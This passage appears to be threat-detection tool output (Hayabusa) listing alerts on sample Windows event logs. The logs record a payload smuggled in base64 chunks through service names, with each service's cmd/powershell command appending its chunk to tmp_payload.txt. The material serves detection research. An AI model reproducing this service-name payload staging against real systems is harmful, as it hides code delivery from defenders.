MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:23.325 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:23.325 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:23.325 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:24.762 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:24.762 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:24.762 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:26.229 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:26.229 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:26.229 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:27.683 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:27.683 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:27.683 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:29.154 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:29.154 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:29.154 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:30.607 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:30.607 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:30.607 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:32.038 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:32.038 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:32.038 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:33.491 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:33.491 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:33.491 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:34.938 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:34.938 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:34.938 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:36.391 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:36.391 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:36.391 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:37.845 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:37.845 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:37.845 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:39.282 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:39.282 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:39.282 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:40.731 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:40.731 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 